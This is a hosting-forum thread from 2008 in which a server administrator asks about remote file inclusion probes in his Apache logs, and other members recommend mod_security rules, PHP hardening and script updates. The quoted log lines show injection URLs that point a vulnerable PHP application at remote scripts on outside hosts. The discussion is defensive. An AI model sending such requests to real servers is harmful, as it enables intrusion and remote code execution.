The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Malicious security probes. What can we do?

Discussion in 'Security' started by jols, Jul 26, 2008.

  1. jols

    jols Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,111
    Likes Received:
    2
    Trophy Points:
    38
    There is an amazing number of probes hitting one of my servers. I'm seeing stuff like this almost constantly in the general apache log file:

    216.246.46.184 - - [26/Jul/2008:06:37:08 -0500] "GET /suspended.page/?error=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 3448

    80.67.27.166 - - [26/Jul/2008:19:13:03 -0500] "GET /suspended.page/?error=http://www.vistawayallstars.com/vistatree/idv6seph.txt??? HTTP/1.1" 200 3448

    193.178.228.12 - - [26/Jul/2008:18:41:03 -0500] "GET /suspended.page/?prefix=http://dantman.com/.../rid??? HTTP/1.1" 200 3448

    etc.

    Obviously they are trying to hit one of the domains and they get diverted to the general Apache log via the suspended page.

    These .txt files are smallish php scripts (usually) that are obviously there to dig up info about the server, e.g. if we have popen and other vulnerable php services open (which we do not), and even also how much disk space is left on the server drive.


    Question --> Now, we do NOT have allow_url_fopen, so how exactly are they getting the an Apache "OK" (200) code with this junk?


    Also, is there anything in the world we can do about this, e.g. insert new mod_security rules that would not interfere with regular legitimate running scripts?

    Thanks for anything on this.
     
  2. niccell

    niccell Well-Known Member

    Joined:
    Aug 10, 2005
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    Install Mod Security Rules

    Please understand this is just my humble opinion.

    Your server has been targeted & they won't give up. Believe me, I've been going through this for MONTHS.....they can't get in, but they don't stop, and the more you report it to the exploited sites & Hosting Data Centers, the more they ignore you.

    I've begun reporting them to IC3 recently as well as some other agencies...hopefully they will actually do something...

    The 'exploit' that you are seeing is an attempt to hack into a poorly written older auction website script....real script-kiddy crud but they get lucky once in a while. The text file typically creates a folder on your server with either a spam list or the PHP to activate a remote spam list. Also, I've seen IRC Bots installed.

    You will need to create some custom mod_security rules to deal with this...even for the short term....the recent one I had (TODAY) was targeted for old PHPBB sites.

    Check your folders with '777' access (if any) to see if there are any unwanted files or folders...you may have to log in to SSH to delete them.

    Also turn OFF register_globals & secure the insecure PHP Commands (shell_exec, etc.) because some of those script kiddie goofballs can acutally get lucky, run the right script, and they will have root access.

    I have about 20 mod_sec rules just dealing with this......I havn't had any complaints of websites saying their sites no longer work.

    GOOD LUCK!
     
  3. bman

    bman Well-Known Member

    Joined:
    Dec 28, 2003
    Messages:
    119
    Likes Received:
    0
    Trophy Points:
    16
    be sure to install mod_security
     
  4. jols

    jols Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,111
    Likes Received:
    2
    Trophy Points:
    38
    Thanks niccell. Yes, so apparently you are writing a different mod_security rule for each different kind of exploit attempt of this sort. I was hoping for something like a "silver bullett" of a mod_security rule here, but no such luck I know.

    But let me ask you this, do you base your rules on the contents of the hack attempt, or on the URL that they are trying to inject?
     
  5. niccell

    niccell Well-Known Member

    Joined:
    Aug 10, 2005
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    I base mine per attack. The website they are attacking from (the redirect URL) is useless, as they change the attacking site constantly as they exploit more sites, and exploited sites get repaired/shut down.

    Also, the 'suspended page' is most likely due to the fact you suspended an account that was successfully hacked, the hackers shared the info, and now all of their little malicious 'friends' are trying to get into the action. You may wish to delete that account.

    Just keep reporting the attacking URL's to both IC3 and the HDC's, and hopefully one of us will get lucky enough that somebody will actually do something.
     
  6. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,381
    Likes Received:
    23
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
    A good example of why it is important that you stress to your clients that they keep their scripts up-to-date. Thats not to say that an up-to-date script won't get hacked into, just that its far less likely to happen. If all of your users update all of their scripts as soon as new updated versions of those scripts are released, then you really minimize the affect that hackers and script-kiddies can have on your server.

    It seems that end users are far too likely to install a script and then be done with it. They don't seem to understand that installing a script on your website is just the beginning, not the end. Because their website is continually made available to visitors and malicious visitors alike, then their website and the scripts and applications that run that website are continually at risk. This differs from an exploit in Microsoft Office or some application that you install on your personal computer. That MS Office installation will not continually be accessible by users on the Internet (at least its far less likely). While I'm not saying it is OK to leave an unpatched MS Office installation on your computer, the dangers involved in doing so are less than the dangers involved when working with an Internet application or script. The Internet is a live platform, its always on, always available making Internet applications and scripts prime targets for hackers and script-kiddies.
     
  7. niccell

    niccell Well-Known Member

    Joined:
    Aug 10, 2005
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    sparek-3, I both agree & disagree. The issue is far more complex than simply 'keep your scripts up to date'...

    1) As long as server ownership can be had by anybody with a few dollars, hacking/spamming is going to happen. This is just a fact of life. Inexperienced server owners are one of the main causes, as the majority don't know what security is, how to achieve it, and typically won't pay somebody who does as they learn the value far too late. To make things even better, how many SERVER OWNERS keep up with their own security updates? Add into the mix the servers that were placed on-line solely for the purpose of spamming/hacking/phishing in countries where there is literally no jourisdiction for internet crime?

    The issue can't be thrust at the server owners solely, but at least in part to the Hosting Data Centers who don't ask anything other than 'can you pay?', rather than 'how do you intend to secure and manage your server', and provide no assistance/training/supervision other than to shut down the server when it is ruined..and the criminals who ruined it are off to their next victim....

    2) As long as hacking/phishing/spamming is a 'nod nod wink wink' noncrime (and let's face it, how many of these criminals are PROSECUTED?), it will continue to expand, especially in the countries where they can make more money phishing/spamming/409 etc. in a DAY than they can doing honest work for a year, with literally no fear of arrest or prosecution.

    3) The lowest common denominator is the site owner. They are trusting the SERVER OWNER to provide a safe, risk-free environment. They are trusting the programmers who wrote the script that it was coded securely.

    There starts the cycle. An inexperienced site owner placing his site on an inexperienced SERVER OWNERS server, with literally thousands of malicious people out there just waiting for this opportunity.
     
Loading...

Share This Page